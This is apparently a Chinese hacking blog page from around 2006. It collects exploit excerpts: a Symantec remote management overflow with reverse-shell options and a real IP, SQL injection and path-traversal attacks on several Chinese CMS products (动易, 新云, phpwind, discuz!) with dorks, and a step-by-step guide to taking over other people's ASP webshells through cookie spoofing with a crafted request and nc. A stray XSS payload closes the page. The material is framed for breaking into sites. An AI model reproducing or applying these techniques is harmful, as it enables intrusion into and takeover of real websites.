Symantec remote management stack buffer overflow exploits for Win32/x86

扫描2967 2976这两个端口

成功率在30%`40%

正向
s -r ip -p 2976

反向
s -r ip -l 你的ip -d 你的端口

PS:
s -r 61.100.149.160

» 阅读全文

信息来源:h4x0r's blog

前段时间就知道动易不止一个洞,这又被人放出来,
通杀ACC,MSSQL 后面就是SQL语句啦

返回信息：
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 'shi'' 之前有未闭合的引号。
/region.asp，行 32

针对mssql的
NBSI 直接列目录 >备份> ok!

作者:Ch4o.Jt
新云的漏洞我不多说就,就因为过滤不当导致下载conn.asp数据库连接文件...
这工具我用了半天时间写,其实也是垃圾东东来的,高手见笑了...
可能你会问,为什么可以读取服务器的数据连接等信息,真的SB一个,偶的程序是把conn.asp文件下载到临时目录,然后程序会过滤并读取出来,1秒钟就完成所有操作...
没法,现在黑站要的是速度和效率...
我看见市面上一些程序,看了简直就是想吐...先是要你填写网站地址,一按就显示漏洞地址:http://www.xxx.com/flash/downfile.asp?url=UploadFile/../../conn.asp
无语,在ASP中可以说是"&"的意思,在PHP中可以说是"."的意思,在Delphi中则是"+"的意思,我晕了...
记住,程序给予的是生命,而不是死记硬背的代码...
注意:本软件仅供测试使用,请不要用于非法用途...

» 阅读全文

传说中的phpwind 0day?

The exploiet Of The All phpwind Version
爆admin的密码散列.
速度极慢...要有耐心

请自行修改
$path="/search.php"; 这个不用改
$server='luoq.net'; 改成目标地址
$cookie=' 你抓的cookies!

喜欢的朋友可以做个GUI界面出来!

» 阅读全文

---------------------------------------------------------------------------
discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dorks: "powered by discuz! 5.0.0
"powered by discuz!
---------------------------------------------------------------------------

» 阅读全文

发布日期：2006-10-21
漏洞发现：Bug.Center.Team

在NewComment.asp文件中

ModuleName = Trim(request("ModuleName"))

这个ModuleName变量没过滤好，从而导致，我们可以在下面的SQL语句中构造我们的
SQL语句

» 阅读全文

思路是通过提交的COOKIE来查看木马的原代码，找出密码
看下面的代码
if trim(request.form("password"))=kiki then
response.cookies("password")="allen" <|>密码是否正确
response.redirect ""&url&""
else if Request.Cookies("password")<>"allen" then
call login() <|>密码错误
response.end <|>停止运行
注意：response.cookies("password")="allen"
他没有要求SESSION认证，仅仅要求COOKIES里的PASSWORD的值是allen。这就是说我门可以通过COOKIES欺骗来达到进入木马的目的，然后找到其密码。
还是实战一次：
1 找到一个后门，呵呵，不是我的，
在google里查找"一次只能执行一个操作:)在本页操作" 这是XP。NET版的标志文字，你也可以换成别的，注意一定要加引号，表示不拆分字符串查询。
这样就找到了许多，呵呵，我选了一个，路径http://ip/images/globla.asp
2 在自己的计算机得到完好的COOKIE信息
我自己的木马http://ip/pic/xp.asp
用到一个工具winsock expert
登陆到自己的ASP木马，然后找到自己木马的路径，停！打开winsock expert选择监视对应的IE，然后回到IE点编辑，此时，IE显示出你的木马的原代码了，转到winsock expert 在前几行有一个用get 方法给你的木马的数据，我的是
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
Accept: */*
Referer:http://202.202.202.202/pic.asp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
看到password=allen了么？这是ASP木马认证你是否登陆了方法。现在很简单了
把 数 据中所有的 ip 和路径改为别人的木马路径。还要将
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
中的PATH=后的值改为别人的木马路径。
我找的木马http://ip/images/globla.asp
所以我改后的数据是
GET /images/globla.asp?id=edit&path=/images/globla.asp&attrib= HTTP/1.1
Accept: */*
Referer:http://202.202.202.202/ima...
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
好了，保存在文本。
3 提交我们的数据
进入命令行，进入NC的目录,键入命令
nc -vv 202.202.202.202 80 >1.txt
>1.txt 表示将返回的信息保存在同目录的1.txt
一定要在CMD下键入命令，直接打开NC无法保存数据
呆会会提示连接成功，然后我门将作好的COOKIE粘贴在里面，然后按两次回车。
实际这时我门就通过了他的 验证并请求木马的原代码。
然后在同目录下1.txt就看到了木马的原代码，

<|>修改下面的kiki改为你密码
if trim(request.form("password"))=kiki then
哈哈，看到密码了，然后登陆吧，再改了密码，这个木马就是你的了。

"><script>alert(675)</script>